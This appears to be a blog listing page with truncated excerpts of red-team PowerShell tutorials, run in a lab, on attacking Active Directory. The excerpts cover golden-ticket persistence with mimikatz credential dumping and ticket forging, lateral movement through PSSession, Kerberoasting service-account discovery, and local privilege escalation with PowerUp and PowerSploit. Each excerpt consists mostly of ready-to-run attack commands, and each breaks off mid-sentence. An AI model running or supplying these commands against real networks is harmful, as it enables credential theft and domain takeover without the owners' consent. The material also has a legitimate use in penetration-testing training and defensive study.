Powershell * RED TEAM SECURITY

Persistence Flow

Persistence Technique: Golden Ticket: Execute mimikatz on DC: mimikatz # privilege::debug mimikatz # lsadump::lsa /patch -computername WIN-2RUMVG5JPOC PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerSploit-master\PowerSploit-master\Exfiltration> Invoke-Mimikatz -Command ‘”lsadump::lsa /patch”‘ On any machine: PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerSploit-master\PowerSploit-master\Exfiltration> Invoke-Mimikatz -Command ‘”kerberos::golden /user:administrator /domain:security.local /sid:S-1-5-21-2515352101-914078745-3278884511-1001 /krbtgt:30ca30e0cbc0f87b2f5bac01794a2357 /id:500 /groups:513 /ptt”‘ To use the DCSync feature for getting krbtgt hash execute the below command with DA privileges for…

Powershell * RED TEAM SECURITY

Lateral Movement Protocols And Tools

One-to-one: PSSession Interactive Runs in a new process (wsmprovhost) Is stateful Useful cmdlets Nw-PSSession Enter-PSSession PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerUp-master\PowerUp-master> New-PSSession -ComputerName  WIN-2RUMVG5JPOC PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerUp-master\PowerUp-master> $sess = New-PSSession -ComputerName WIN-2RUMVG5JPOC PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerUp-master\PowerUp-master> Enter-PSSession -Session $sess [WIN-2RUMVG5JPOC]: PS C:\Users\Administrator\Documents> hostname One-to-many: Also known as fan-out remoting. Non-interactive. Executes commands parallel. Useful cmdlets. Invoke-command: Invoke-command Run commands & scripts on…

Powershell * RED TEAM SECURITY

Domain Privilege Escalation

Domain Priv Escalation : Kerberoast:- Find service account: GetUserSPNs https://github.com/nidem/kerberoast/blob/master/GetUserSPNs.ps1 Powerview: PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerTools-master\PowerTools-master\PowerView> Get-NetUser –SPN Active directory Module: PS C:\Users\victim6\Downloads\new\new\tool\tool\ADModule-master\ADModule-master> Import-Module .\Import-ActiveDirectory.ps1 PS C:\Users\victim6\Downloads\new\new\tool\tool\ADModule-master\ADModule-master> Import-Module .\Microsoft.ActiveDirectory.Management.dll PS C:\Users\victim6\Downloads\new\new\tool\tool\ADModule-master\ADModule-master> Get-ADUser -filter {ServicePrincipalName -ne “$null”} -Properties serviceprincipalname If we are getting error of “You cannot call a method on a null-valued expression” Then use below command to…

Powershell * RED TEAM SECURITY

Local Privilege Escalation

PowerUP: PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerTools-master\PowerTools-master> cd .\PowerUp\ PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerTools-master\PowerTools-master\PowerUp> dir PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerTools-master\PowerTools-master\PowerUp> . .\PowerUp.ps1 Get services with unquoted paths and a space in their executable path: PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerTools-master\PowerTools-master\PowerUp> Get-ServiceUnquoted –vebose Get services where the current user can write to its binary path: PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerSploit-master\PowerSploit-master> Import-Module .\PowerSploit.psm1 PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerSploit-master\PowerSploit-master> Get-ModifiableService –verbose Get the services which current user can…